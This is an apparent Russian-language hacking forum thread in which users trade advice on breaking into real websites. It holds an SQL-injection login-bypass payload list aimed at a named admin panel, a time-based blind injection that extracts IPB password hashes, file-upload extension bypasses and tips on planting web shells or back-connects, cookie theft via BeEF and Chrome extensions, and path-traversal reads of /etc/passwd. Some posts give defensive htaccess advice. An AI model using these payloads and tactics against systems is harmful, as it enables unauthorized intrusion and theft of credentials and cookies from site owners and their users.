Disabled PHP Functions: exec,system,passthru,shell_exec,popen,show_source, posix_getpwuid,posix_setuid,posix_uname,cmd,escape shellcmd,popen,proc_open,dbmopen,suexec,pcntl_exec ,phpinfo,php_uname,mail,mb_send_mail
Крик души! Если есть какие-нибудь варианты буду рад обсудить!
P.S.
Смотрю в сторону использования CGI , PERL, но ничего не смыслю в этом!
это как будто викторина без конца, по ключевым словам вопрос гуглится очень хорошо, если ты перепробуешь то что уже придумано, и это не работает, то стоит подкорректировать вопрос упомянув что уже было испробовано
MyNameIsWhoIsWho
28.11.2017, 12:22
Ребят подскажите, нашел файл аплоад, но хз как отправить файл пост запросом)
Хтмл формы для заливки нет.
Как мне вообще создать запрос на отправку файла? И чем его отправить?
Знаю что тупой вопрос, но почему то всегда игнорировал эту тему а теперь пришлось столкнуться
Или ткните носом в инфу, полистал форум с гуглом, что-то не нашел
MyNameIsWhoIsWho said:
↑ (https://antichat.live/posts/4154354/)
Ребят подскажите, нашел файл аплоад, но хз как отправить файл пост запросом)
Хтмл формы для заливки нет.
Как мне вообще создать запрос на отправку файла? И чем его отправить?
Знаю что тупой вопрос, но почему то всегда игнорировал эту тему а теперь пришлось столкнуться
Или ткните носом в инфу, полистал форум с гуглом, что-то не нашел
Плагином для лисы
MyNameIsWhoIsWho
28.11.2017, 12:31
BabaDook said:
↑ (https://antichat.live/posts/4154358/)
Вы уверены что файл рабочий, в крации вам нужен параметр, его можно прочитать, или угадать, ткните пальцем в небо и быть может вы попадёте в звезду зелёного цвета. Надеюсь я достаточно ясно объяснил на сколько это реально сделать
Ничего не понял.
Есть пхп скрипт, где загрузка файла не фильтруется. Параметр для пост запроса я знаю, просто пост запрос знаю как отправлять, но не знаю как отправлять файл пост запросом скрипту без хтмл формы
MotherHacker
28.11.2017, 14:12
MyNameIsWhoIsWho said:
↑ (https://antichat.live/posts/4154359/)
Ничего не понял.
Есть пхп скрипт, где загрузка файла не фильтруется. Параметр для пост запроса я знаю, просто пост запрос знаю как отправлять, но не знаю как отправлять файл пост запросом скрипту без хтмл формы
Создаёшь файл на рабочем столе index.html
Открываешь файл и пишешь:
HTML:
Затем открываешь index.html в браузере
gena ryzhov
29.11.2017, 01:57
MotherHacker said:
↑ (https://antichat.live/posts/4154398/)
Создаёшь файл на рабочем столе index.html
Открываешь файл и пишешь:
HTML:
Затем открываешь index.html в браузере
http://htmlbook.ru/html/form/enctype
MyNameIsWhoIsWho
29.11.2017, 07:21
gena ryzhov said:
↑ (https://antichat.live/posts/4154583/)
http://htmlbook.ru/html/form/enctype
Я вкурсе, спасибо)
Мне надо это было под массы заточить и отследить сам запрос, а не по одному ручками сидеть отправлять)
Другой вопрос. Вот это добро можно как то привести в человеческий вид? Чтоб код читабельный был.
http://clip2net.com/s/3PSUKqs
MotherHacker
29.11.2017, 12:10
MyNameIsWhoIsWho said:
↑ (https://antichat.live/posts/4154608/)
Другой вопрос. Вот это добро можно как то привести в человеческий вид? Чтоб код читабельный был.
http://clip2net.com/s/3PSUKqs
Всё можно
https://goo.gl/VneRw3
BabaDook
29.11.2017, 23:13
Вась. Я тебя не понимаю, у тебя вопросы вообще адовые. Тебя так не помогут
Octavian
02.12.2017, 17:44
Можно сделать проверку Referer через .htaccess дабы получить защиту от CSRF ?
Вот таой замечательный сайт
.SpoilerTarget" type="button">Spoiler: 1
cyber-cafe.ru/admin/
вбить admin: admin - и тебе скажет, что нет логина и пароля. Есть вбить комбинации в сплойлере - выходит ошибка синтакс еррор. Вопрос к знатокам: действительно ли не получится авторизоваться, или нужен другой вектор?
Или иногда ошибка бывает простой ошибкой без возможности авторизации?
.SpoilerTarget" type="button">Spoiler: 2
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
Octavian said:
↑ (https://antichat.live/posts/4155917/)
Можно сделать проверку Referer через .htaccess дабы получить защиту от CSRF ?
Code:
RewriteEngine On
RewriteCond %{HTTP_REFERER} !^http(s)?://(www\.)?site.com/.*
RewriteRule .* - [F]
Octavian
02.12.2017, 22:30
Что я сделол неправильно
Code:
RewriteEngine On
RewriteCond %{HTTP_REFERER} !^http(s)?://(www\.)?localhost/.*
RewriteRule .* - [F]
Directory нельзя использовать в .htaccess, только в конфигурационном файле.
Вот так можно попробовать:
Code:
RewriteEngine On
RewriteCond %{HTTP_REFERER} !^http(s)?://(www\.)?site.com/.*
RewriteRule .* - [F]
johncena55
03.12.2017, 05:39
Помогите пожалуйста.
Нашел DB, нашел в ней таблицы, но при попытке найти колонны, соглашаюсь на поиск через файл перебором, выставляю 1 поток, но он очень быстро прогоняет и затем крашится. Снова можно эксплуатировать примерно через час, пытался загрузить прокси, не помогло. Может кто то сталкивался с этим? Еще нет DB Information_schema. Может тоже влияет на это?
.SpoilerTarget" type="button">Spoiler: screenshots
http://prntscr.com/hicbz6 , http://prntscr.com/hiccg8
johncena55 said:
↑ (https://antichat.live/posts/4156026/)
Помогите пожалуйста.
Нашел DB, нашел в ней таблицы, но при попытке найти колонны, соглашаюсь на поиск через файл перебором, выставляю 1 поток, но он очень быстро прогоняет и затем крашится. Снова можно эксплуатировать примерно через час, пытался загрузить прокси, не помогло. Может кто то сталкивался с этим? Еще нет DB Information_schema. Может тоже влияет на это?
Spoiler: screenshots
http://prntscr.com/hicbz6
,
http://prntscr.com/hiccg8
вручную пробовал?
johncena55
03.12.2017, 06:44
Gorev said:
↑ (https://antichat.live/posts/4156027/)
вручную пробовал?
Сделал только что так: вписал в текстовик только (email, password). Кастомный перебор, нашел эти 2 колонки. Краш прекратился, но попробовал дамп, получил ошибку..
Названия нашлись, а вот нумерации нет, что это значит?
.SpoilerTarget" type="button">Spoiler: screenshot
https://prnt.sc/hictfm
johncena55 said:
↑ (https://antichat.live/posts/4156029/)
Сделал только что так: вписал в текстовик только (email, password). Кастомный перебор, нашел эти 2 колонки. Краш прекратился, но попробовал дамп, получил ошибку..
Названия нашлись, а вот нумерации нет, что это значит?
Spoiler: screenshot
https://prnt.sc/hictfm
Вручную в браузере! Попробуй dios запрос для дампа.
serg1234
04.12.2017, 17:01
Подскажите, пожалуйста, как такое можно побороть и чем.
делаю запрос:
http:///recover.view?query=query+and+1=1+--+
возвращается ответ с ошибкой:
internal error.
Exception java.lang.NullPointerException
Message null
Java version Oracle Corporation 1.7.0_151
Operating system Linux 4.10.0-19-generic
Server jetty-6.1.x
Memory Used 140 of 509 MB
Stack trace java.lang.NullPointerException
пробовал подставлять другие sql-инъекции - ответ такой же.
sqlmap тоже ничем не помог.
подскажите в какую сторону рыть?
Кто разбирается в расширениях хром? Есть доступ к аккаунту хрома, нужно вытащить инфу(куки) возможно? Смотрю в сторону установки расширений. Могу сделать синхронизацию.
MotherHacker
05.12.2017, 22:04
SSSmith said:
↑ (https://antichat.live/posts/4157057/)
Кто разбирается в расширениях хром? Есть доступ к аккаунту хрома, нужно вытащить инфу(куки) возможно? Смотрю в сторону установки расширений. Могу сделать синхронизацию.
Если я правильно понял, content scripts. Вставляет указанный js файл в код сайта.
Octavian
05.12.2017, 23:58
Может быть такое чтоб открылось XSS уязвимость несмотря на использование
Code:
htmlspecialchars()
htmlentities()
Если да то можно примеры?
Например тут можно делать инекцыю?
Code:
В БД пароль обозначен так:
Code:
‘Љ‹0ы1Г
- ине только он один, а вся таблица.
Как расшифровать каракатицу и чем? Для примера:
Code:
-nж 5мЇгҐ¶Q§
Code:
t2Ж•\\s‘ГК2В
Muracha said:
↑ (https://antichat.live/posts/4160754/)
В БД пароль обозначен так:
Code:
‘Љ‹0ы1Г
- ине только он один, а вся таблица.
Как расшифровать каракатицу и чем? Для примера:
Code:
-nж 5мЇгҐ¶Q§
Code:
t2Ж•\\s‘ГК2В
Ты вручную так вывел инфу из бд ?
Gorev said:
↑ (https://antichat.live/posts/4160783/)
Ты вручную так вывел инфу из бд ?
да, позже я нашел скрипт, который вбивает это в БД - все же это в раздел криптографии.
blackbox
15.12.2017, 11:24
Скажите, тут prepared statements и ничего сделать нельзя или есть варианты? Вывод ошибки: https://pastebin.com/19DdVy7f
И второй вопрос, есть доступ к переменной, которая участвует в sql запросе:
Но она обрабатыввается такой функцией. В итоге все скобки в запросе у меня отфильтровались. Что можно сделать?
Code:
function key_check($key) {
if ($key == '') { return ''; }
$key = preg_replace("/[^\w\xB2-\xB4\xBF-\xFF\xA5\xA8\xAA\xAF\xB8\xBA\s]/", "", $key );
if ($key =='_SERVER' OR $key =='_SESSION' OR $key =='_FILES' OR $key =='_REQUEST' OR $key =='GLOBALS') die("Error variable ".basename(__FILE__)." ".__LINE__."");
else return $key;
}
Octavian
21.12.2017, 02:50
как зменить код ответа
Code:
HTTP/1.1 403 Forbidden
на
Code:
HTTP/1.1 404 Not Found
через htaccess
просто если даже делаю так
Code:
ErrorDocument 401 /erorr.html
ErrorDocument 404 /erorr.html
ErrorDocument 500 /erorr.html
ErrorDocument 403 /erorr.html
сканер видит по ответу что у меня есть такои директории /admin/ckeditor/ итд.
возможно так заработает
ErrorDocument 404 /errors/404_redirect.php
Code:
ErrorDocument 403 /404.php
Code:
Code:
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^ - [L,R=404]
Diego228
23.12.2017, 01:15
Есть ли какие то способы заливки шелла для IPB 4.2?
Octavian
26.12.2017, 02:23
Помогите понять что попадает в параметре template=
Code:
POST /upload/?template=8849c262187451b5f558f4c2f150ec67efaafc19 2f51b1b8983754090e0c767bb%2B5SL0SVpqqHUB7zPYvNzEMS anK9r2uL7xUe%2FTK%2B9rofXD6gqQpsIKB2P7aECihmfEwEdQ aLG6Kz3W5B1wiwxZRbdutdBbRYClAAoZ%2FbhaTdm2VnPBVZKu isi3cVVM91p2%2Fpjb%2FqSPor7%2F026fq9PitSBizAtSbf85 8%2FBcTu7sw%3DH2pFMj%2BuoRaSnqqPdNbdrZzh3AF9H0uhag E9V7R6V8Ed67HFvGYS%2FCg9DReGtlj1n1HtjpV14qqfYt5l%2 FtVesG2B%2FXh84tkr14t%2FRgTUA7cXwn3bWEWUcjxCFWlmAs 2RXLs6g1Up3e%2Fg4rolmGO8JAbFwRXWhFQQvZMx1%2BD5tjM% 3DTie6y7lK%2Fq6Vlw9ssVYUYDP5Il5dYZxGPtkJSkaOPNGjki n81azLZFdtU7K6wUBcHYOoZzhthYdFMIK8K30UMGPMQI9%2Fd4 AKJsATT1PXaw%2FA1bjkMnapCdJl4IWGNs55IgHEs6mMPENlBu VodjQXJNodIkXOFa%2BI%2Bq%2BMlGu0Rls%3D HTTP/1.1
Code:
/upload/?template=3e7a792a56f73e65a69d106dc937b900c21794cd d870480ccdf1703f705c3190CZuXC41C79ucpR7ux0R8iRkUg2 iadWk4ZAfJsKydlbETDNhV%2B3kMjiatmsMvXttCDpHmndniTF h6rcH4A7Cx6kwnj1jqNtPx%2FrmnG%2BtK15L9X6o%2FBYRnb8 WBm%2BkZY%2FQPq2xnQekesyQVY4Ht2wtqnCqwLajg9VcRe1XI ivwy1G4%3D
Octavian said:
↑ (https://antichat.live/posts/4165649/)
Помогите понять что попадает в параметре template=
Code:
POST /upload/?template=8849c262187451b5f558f4c2f150ec67efaafc19 2f51b1b8983754090e0c767bb%2B5SL0SVpqqHUB7zPYvNzEMS anK9r2uL7xUe%2FTK%2B9rofXD6gqQpsIKB2P7aECihmfEwEdQ aLG6Kz3W5B1wiwxZRbdutdBbRYClAAoZ%2FbhaTdm2VnPBVZKu isi3cVVM91p2%2Fpjb%2FqSPor7%2F026fq9PitSBizAtSbf85 8%2FBcTu7sw%3DH2pFMj%2BuoRaSnqqPdNbdrZzh3AF9H0uhag E9V7R6V8Ed67HFvGYS%2FCg9DReGtlj1n1HtjpV14qqfYt5l%2 FtVesG2B%2FXh84tkr14t%2FRgTUA7cXwn3bWEWUcjxCFWlmAs 2RXLs6g1Up3e%2Fg4rolmGO8JAbFwRXWhFQQvZMx1%2BD5tjM% 3DTie6y7lK%2Fq6Vlw9ssVYUYDP5Il5dYZxGPtkJSkaOPNGjki n81azLZFdtU7K6wUBcHYOoZzhthYdFMIK8K30UMGPMQI9%2Fd4 AKJsATT1PXaw%2FA1bjkMnapCdJl4IWGNs55IgHEs6mMPENlBu VodjQXJNodIkXOFa%2BI%2Bq%2BMlGu0Rls%3D HTTP/1.1
Code:
/upload/?template=3e7a792a56f73e65a69d106dc937b900c21794cd d870480ccdf1703f705c3190CZuXC41C79ucpR7ux0R8iRkUg2 iadWk4ZAfJsKydlbETDNhV%2B3kMjiatmsMvXttCDpHmndniTF h6rcH4A7Cx6kwnj1jqNtPx%2FrmnG%2BtK15L9X6o%2FBYRnb8 WBm%2BkZY%2FQPq2xnQekesyQVY4Ht2wtqnCqwLajg9VcRe1XI ivwy1G4%3D
больше бы информации ,что за движок и т.д https://builtwith.com https://www.larger.io
Octavian
26.12.2017, 21:19
Саит загружает картинки с названием
Code:
2441514308688-asd.php.jpg
как я могу збросить .jpg
Пробовал
Code:
2441514308688-asd.php%00.jpg
2441514308688-asd.php\n.jpg
2441514308688-asd.php;.jpg
BabaDook
26.12.2017, 21:23
https://i.simpalsmedia.com/upload/?template=
Octavian
26.12.2017, 21:35
BabaDook said:
↑ (https://antichat.live/posts/4165945/)
https://i.simpalsmedia.com/upload/?template=
Я зарепортил исправили
karkajoi
26.12.2017, 22:54
Добрый день, подскажите инструменты для проведения time based blind injection. Мапа и марковка не видят, руками до 2го пришествия можно крутить((
Alexandr17
26.12.2017, 23:18
karkajoi said:
↑ (https://antichat.live/posts/4166016/)
Добрый день, подскажите инструменты для проведения time based blind injection. Мапа и марковка не видят, руками до 2го пришествия можно крутить((
based blind Havij не возьмет. Просканируй Burpsuite на наличие уязвимости или Acunetix. Может не точный параметр сканер определил из-за этого не видит уязвимость скульмап
karkajoi
26.12.2017, 23:36
Alexandr17 said:
↑ (https://antichat.live/posts/4166022/)
based blind Havij не возьмет. Просканируй Burpsuite на наличие уязвимости или Acunetix. Может не точный параметр сканер определил из-за этого не видит уязвимость скульмап
Нет,руками крутится
Alexandr17
26.12.2017, 23:44
Если руками крутится значит и сульмап должен видеть. Ему надо точный параметр. В таргете что-то не так
Octavian
26.12.2017, 23:47
karkajoi said:
↑ (https://antichat.live/posts/4166028/)
Нет,руками крутится
Пробуи
Code:
--level=3 --risk=3 --user-agent
Alexandr17
26.12.2017, 23:51
Octavian said:
↑ (https://antichat.live/posts/4166035/)
Пробуи
Code:
--level=3 --risk=3 --user-agent
based blind без этих значений мап не увидит уязвимость. Так что обязательно надо подставлять. А там уже и темперы по надобности
Alexandr17
27.12.2017, 00:22
ms13 said:
↑ (https://antichat.live/posts/4166047/)
????
Что за бред...
Ну хз... У меня лично без этих значений не видел мап уязвимости based blind, ни по GET и POST параметру
karkajoi said:
↑ (https://antichat.live/posts/4166028/)
Нет,руками крутится
sqlmap
https://github.com/ron190/jsql-injection
https://github.com/alessiovierti/blindpie
https://github.com/awnumar/blind-sql-bitshifting
https://github.com/missDronio/blindy
karkajoi
27.12.2017, 03:30
grimnir said:
↑ (https://antichat.live/posts/4166054/)
sqlmap
https://github.com/ron190/jsql-injection
https://github.com/alessiovierti/blindpie
https://github.com/awnumar/blind-sql-bitshifting
https://github.com/missDronio/blindy
Не помогло(( Мапа на отрез отказывается видеть, марковка хоть как-то реагирует, мапа тупо игнорить. Какие ещё есть варианты ?
Alexandr17
27.12.2017, 11:00
karkajoi said:
↑ (https://antichat.live/posts/4166100/)
Не помогло(( Мапа на отрез отказывается видеть, марковка хоть как-то реагирует, мапа тупо игнорить. Какие ещё есть варианты ?
Есть еще SQLI Dumper. Пихай скулю в него. Может получиться. Но почему мап не видет тут загадка. Я думаю что в таргете что-то не так. Тебе нужно просканировать бурпом. И результаты с него кинуть в мап. Я так понял у тебя по GET запросу скуля? Подставляй значение --level=5 --risk=3 --space2comment --random-agent и потоки выставь на минимум. Пробуй менять значение. Если по POST запросу скуля, то Дампером и не пробуй даже
karkajoi
27.12.2017, 12:10
Мапой добился вывода имена БД , Mysql 5+, таблицы выводить не хочет , начинает брутфорсить и ничего не находит, думаю там префикс не стандартный который надо узнать, двигло IPB, дефолтные талицы не подхоят
Alexandr17
27.12.2017, 13:13
karkajoi said:
↑ (https://antichat.live/posts/4166197/)
Мапой добился вывода имена БД , Mysql 5+, таблицы выводить не хочет , начинает брутфорсить и ничего не находит, думаю там префикс не стандартный который надо узнать, двигло IPB, дефолтные талицы не подхоят
Делай дамп БД без вывода таблиц
karkajoi
27.12.2017, 14:29
Выдрал талицу, вектор вот такой(оказалось вот такой префикс ibf_)
Code:
and (select sleep(5) from dual where (select members_pass_salt from ibf_members where name like '%Wilda%' limit 0,1) like '______')-- -' True
and (select sleep(5) from dual where (select members_pass_hash from ibf_members where name like '%Wilda%' limit 0,1) like '________________________________')-- -' True
Из чего следует что соль будет 5 символов, а хєш пароля 32
Вопрос,я понял что теперь остается брутить символы, только как узнать правильную их последовательность?
Octavian
27.12.2017, 20:23
Есть саит которыи позволяет загружать .php фаилы которые доступны админу он их открывает(проверил отправив svg с js-ом) но у меня в тои директории нету доступа по IP (Forbided), вопрос что можно отправить ему в php фаиле чтоб получить доступ после выполнение(нужно максимально все варианты запихнуть в php шанс думаю будет 1)?
PS. Одна из идеи было переписать .htaccess
karkajoi
27.12.2017, 20:48
Octavian said:
↑ (https://antichat.live/posts/4166451/)
Есть саит которыи позволяет загружать .php фаилы которые доступны админу он их открывает(проверил отправив svg с js-ом) но у меня в тои директории нету доступа по IP (Forbided), вопрос что можно отправить ему в php фаиле чтоб получить доступ после выполнение(нужно максимально все варианты запихнуть в php шанс думаю будет 1)?
PS. Одна из идеи было переписать .htaccess
записать в файл Можно замаскировать в base64, или посмотреть ещё вариаты минишелов, которые менее всего привлекают внимания. Есть ещё варианты, но надо знать локальный путь
Octavian
27.12.2017, 20:52
karkajoi said:
↑ (https://antichat.live/posts/4166458/)
записать в файл Можно замаскировать в base64, или посмотреть ещё вариаты минишелов, которые менее всего привлекают внимания. Есть ещё варианты, но надо знать локальный путь
Ты внимательно читаи знаеш что твкое IP?
karkajoi
27.12.2017, 23:20
Octavian said:
↑ (https://antichat.live/posts/4166460/)
Ты внимательно читаи знаеш что твкое IP?
Значит ищи раскрытие путей, и заливай мини шел через php файл
Octavian said:
↑ (https://antichat.live/posts/4166451/)
Есть саит которыи позволяет загружать .php фаилы которые доступны админу он их открывает(проверил отправив svg с js-ом) но у меня в тои директории нету доступа по IP (Forbided), вопрос что можно отправить ему в php фаиле чтоб получить доступ после выполнение(нужно максимально все варианты запихнуть в php шанс думаю будет 1)?
PS. Одна из идеи было переписать .htaccess
Как вариант beef, суешь в PHP hook.js, и куки админа твои... Или по обстоятельствах.
Octavian
28.12.2017, 04:37
karkajoi said:
↑ (https://antichat.live/posts/4166522/)
Значит ищи раскрытие путей, и заливай мини шел через php файл
_
Octavian
28.12.2017, 04:38
zifus said:
↑ (https://antichat.live/posts/4166551/)
Как вариант beef, суешь в PHP hook.js, и куки админа твои... Или по обстоятельствах.
Ты внимательно читаи знаеш что твкое IP?+(проверил отправив svg с js-ом) я отправив js получял уже куки и там по кукам видно что ораничения по IP )
Octavian said:
↑ (https://antichat.live/posts/4166451/)
Есть саит которыи позволяет загружать .php фаилы которые доступны админу он их открывает(проверил отправив svg с js-ом) но у меня в тои директории нету доступа по IP (Forbided), вопрос что можно отправить ему в php фаиле чтоб получить доступ после выполнение(нужно максимально все варианты запихнуть в php шанс думаю будет 1)?
PS. Одна из идеи было переписать .htaccess
Бекконнект как вариант, далее по обстоятельствам.
Octavian
30.12.2017, 17:50
Где я могу наить отдельно все комбинацыии из для Bruteforce
Code:
4 цыфр
5 цыфр
6 цыфр
7 цыфр
8 цыфр
9 цыфр
10 цыфр
Octavian said:
↑ (https://antichat.live/posts/4167468/)
Где я могу наить отдельно все комбинацыии из для Bruteforce
Code:
4 цыфр
5 цыфр
6 цыфр
7 цыфр
8 цыфр
9 цыфр
10 цыфр
сгенерировать самому через http://unifiedlm.com/Download или PasswordsPro /Если верно помню 10 цифр будет весить 111 Гб
Octavian
30.12.2017, 19:47
grimnir said:
↑ (https://antichat.live/posts/4167505/)
сгенерировать самому через
http://unifiedlm.com/Download
или PasswordsPro /Если верно помню 10 цифр будет весить 111 Гб
+ вопрос как мог выполнется запрос если он меняет HOST ?
Code:
https://hackerone.com/reports/226659
BabaDook
30.12.2017, 20:29
Octavian said:
↑ (https://antichat.live/posts/4167515/)
+ вопрос как мог выполнется запрос если он меняет HOST ?
Code:
https://hackerone.com/reports/226659
Ну ты прочитай
Octavian
30.12.2017, 20:59
Немогу некак понять Host Header Atack что я не совал в Host: ничего не меняется в [SERVER_NAME] и [HTTP_HOST] инструкцию брал
Code:
https://habrahabr.ru/post/166855/
https://image.ibb.co/cKNOjw/image.jpg
BabaDook
30.12.2017, 21:07
Я просто не понимаю, какой результат ты ожидаешь
Octavian
30.12.2017, 21:20
BabaDook said:
↑ (https://antichat.live/posts/4167534/)
Я просто не понимаю, какой результат ты ожидаешь
Чтоб одна из переменых [SERVER_NAME] и [HTTP_HOST] поменялась на ok.ru как на фото
С https://habrahabr.ru/post/166855/
Code:
Оправляем
GET http://site.dev/phpinfo.php HTTP/1.1
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Charset:windows-1251,utf-8;q=0.7,*;q=0.3
Accept-Language:ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Cache-Control:max-age=0
Connection:keep-alive
Host:~%#$^&*()<>?@\!."'{}[]=+|
Referer:http://site.dev/index.htm
User-Agent:TelnetTest
И смотрим:
_SERVER["SERVER_NAME"]: ~%#$^&*()<>?@\!."'{}[]=+|
_SERVER["HTTP_HOST"]: ~%#$^&*()<>?@\!."'{}[]=+|
Octavian said:
↑ (https://antichat.live/posts/4167538/)
Чтоб одна из переменых [SERVER_NAME] и [HTTP_HOST] поменялась на ok.ru как на фото
С
https://habrahabr.ru/post/166855/
Code:
Оправляем
GET http://site.dev/phpinfo.php HTTP/1.1
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Charset:windows-1251,utf-8;q=0.7,*;q=0.3
Accept-Language:ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Cache-Control:max-age=0
Connection:keep-alive
Host:~%#$^&*()<>?@\!."'{}[]=+|
Referer:http://site.dev/index.htm
User-Agent:TelnetTest
И смотрим:
_SERVER["SERVER_NAME"]: ~%#$^&*()<>?@\!."'{}[]=+|
_SERVER["HTTP_HOST"]: ~%#$^&*()<>?@\!."'{}[]=+|
https://vlevit.org/ru/blog/tech/host-spoofing-prevention
http://rus-linux.net/MyLDP/server/securing-apache-part-5-http-message-architecture.html
http://nginx.org/en/docs/http/request_processing.html
Alexandr17
31.12.2017, 01:13
BabaDook said:
↑ (https://antichat.live/posts/4167534/)
Я просто не понимаю, какой результат ты ожидаешь
Годно. Побольше бы таких гайдов по бурпу. Программа многофункциональная. С одной теорией мне лично сложновато понять полный функционал. Особенно фаззинг и так далее...
BabaDook
31.12.2017, 01:48
Alexandr17 said:
↑ (https://antichat.live/posts/4167665/)
Годно. Побольше бы таких гайдов по бурпу. Программа многофункциональная. С одной теорией мне лично сложновато понять полный функционал. Особенно фаззинг и так далее...
Так есть же гайд по бурпу
/threads/servis-staty-po-realpazam.452520/#post-4124151 (https://antichat.live/threads/servis-staty-po-realpazam.452520/)
Octavian
03.01.2018, 00:59
Делаю простую XSS которая внедряется но выдает ошибку в Console
Code:
Uncaught ReferenceError: PROMPT is not defined
at profile:107
Octavian said:
↑ (https://antichat.live/posts/4168697/)
Делаю простую XSS которая внедряется но выдает ошибку в Console
Code:
Uncaught ReferenceError: PROMPT is not defined
at profile:107
Привычка капсом все писать? Попробуй prompt
Octavian
03.01.2018, 18:19
Zen1T21 said:
↑ (https://antichat.live/posts/4168749/)
Привычка капсом все писать? Попробуй prompt
Да точно дело в пробеле просто думал что регистр не важен, саит сам переделол в большои регистр
Octavian
03.01.2018, 22:10
У меня такои сплоит не работает https://xakep.ru/2017/01/12/phpmailer-exploit/ или в новои версии PHP исправили?
Code:
Octavian said:
↑ (https://antichat.live/posts/4168950/)
У меня такои сплоит не работает
https://xakep.ru/2017/01/12/phpmailer-exploit/
или в новои версии PHP исправили?
Code:
который без патча [B][SIZE="5"]PHPMailer
Octavian
03.01.2018, 23:07
[QUOTE="grimnir"]
grimnir said:
↑ (https://antichat.live/posts/4168961/)
который без патча
[B][SIZE="5"]PHPMailer
Octavian said:
↑ (https://antichat.live/posts/4168950/)
У меня такои сплоит не работает
https://xakep.ru/2017/01/12/phpmailer-exploit/
Где у тебя? Какой MTA установлен? К примеру, postfix не поддерживает -X.
Octavian said:
↑ (https://antichat.live/posts/4168950/)
или в новои версии PHP исправили?
Это не баг, это фича.
Наткнулся на одном сервере на Apache Tomcat 8.5.23 - перед глазами страница с радостной надписью, что сервер успешно установлен.
Доступ к
Code:
/manager/html
/host-manager/html
/manager/status
Заблочен - я так понял по быстрому чтению доков - заблочен из коробки во имя безопасности.
Но чутью зверя подсказывает, что нерадивый одмен забыл/забил на конфигурацию и как-то это можно раскрутить.
Можно ли, уважаемые знатоки? Прошу вектор.
Octavian
13.01.2018, 03:54
Получил доступ к чтению фаилов но не могу добратся до конфига Laravel, помогите приватно
ShpillyWilly
13.01.2018, 18:10
Товарищи, помогите пллз.
Есть урл site,com/download_file.php?path=xxxxxxx/65/1 где x-разные циферки
в зависимости от того, что вводишь, скачиваются либо разные пдфки, либо пустой файл download_file.php, но наверняка же можно и чего-нибудь интересное скачать.
как можно поискать закономерности в этом цифровом path?)
BabaDook
13.01.2018, 18:13
ShpillyWilly said:
↑ (https://antichat.live/posts/4172934/)
Товарищи, помогите пллз.
Есть урл site,com/download_file.php?path=xxxxxxx/65/1 где x-разные циферки
в зависимости от того, что вводишь, скачиваются либо разные пдфки, либо пустой файл download_file.php, но наверняка же можно и чего-нибудь интересное скачать.
как можно поискать закономерности в этом цифровом path?)
site,com/download_file.php?path=../../../../../etc/passwd
site,com/download_file.php?path=file:///etc/passwd
site,com/download_file.php?path=http://site.ua
site,com/download_file.php?path= итд
ShpillyWilly
13.01.2018, 18:21
BabaDook said:
↑ (https://antichat.live/posts/4172939/)
site,com/download_file.php?path=../../../../../etc/passwd
site,com/download_file.php?path=file:///etc/passwd
site,com/download_file.php?path=
http://site.ua
site,com/download_file.php?path= итд
ессно я сразу же это попроовал)
я к тому, что наверняка же есть какая-то закономерность. Почему именно /65/ ? и почему последнее число всегда не больше 3х...
erwerr2321
13.01.2018, 18:27
BabaDook said:
↑ (https://antichat.live/posts/4172939/)
site,com/download_file.php?path=../../../../../etc/passwd
site,com/download_file.php?path=file:///etc/passwd
site,com/download_file.php?path=
http://site.ua
site,com/download_file.php?path= итд
Спс, БабаДук!
Сразу наш0л много чего интересного в практически безнадёжных вариантах!
Плюсую
+
BabaDook
13.01.2018, 18:40
ShpillyWilly said:
↑ (https://antichat.live/posts/4172943/)
ессно я сразу же это попроовал)
я к тому, что наверняка же есть какая-то закономерность. Почему именно /65/ ? и почему последнее число всегда не больше 3х...
Ксорил числа?
алгоритм такой
ShpillyWilly
16.01.2018, 19:04
Товарищи, есть такой вопрос.
Есть доступ к PMA, file_priv есть, но на мускуле стоит --secure-file-priv, а это значит, что я могу проводить операции с файлами только в рамках дефлтовой мускульной директории. Файлы сервака(psswd, конфиг апача) мне удалось почитать через LOAD DATA LOCAL INFILE, загружая их содержимое в мной созданную таблицу. В итоге у меня есть раскрытые пути, но есть ли вариант залиться куда-нибудь, кроме директории, указанной в --secure-file-priv ? или это без шансов и надо искать другой вектор? Спасибо.
ShpillyWilly said:
↑ (https://antichat.live/posts/4173821/)
Товарищи, есть такой вопрос.
Есть доступ к PMA, file_priv есть, но на мускуле стоит --secure-file-priv, а это значит, что я могу проводить операции с файлами только в рамках дефлтовой мускульной директории. Файлы сервака(psswd, конфиг апача) мне удалось почитать через LOAD DATA LOCAL INFILE, загружая их содержимое в мной созданную таблицу. В итоге у меня есть раскрытые пути, но есть ли вариант залиться куда-нибудь, кроме директории, указанной в --secure-file-priv ? или это без шансов и надо искать другой вектор? Спасибо.
файлы проекта попробовать почитать, посмотреть как он с данными из бд работает
Metasploit показывает 3 уязвимости + модули к этим уязвимостям, но получить сессию не получается почему ?
ХОЗЯИН ТИП ОТКРЫТ ОПИСАНИЕ МОДУЛЬ АТАКИ
107.154.249.133 - 107.154.249.133.ip.incapdns.net (https://localhost:3790/hosts/813)
Уязвим к exploit/multi/misc/java_rmi_server
Но не подключится, это как пример на другом сервере 3 уязвимости
Octavian
26.01.2018, 23:56
Сама страница получяет такои ответ от сервера
Code:
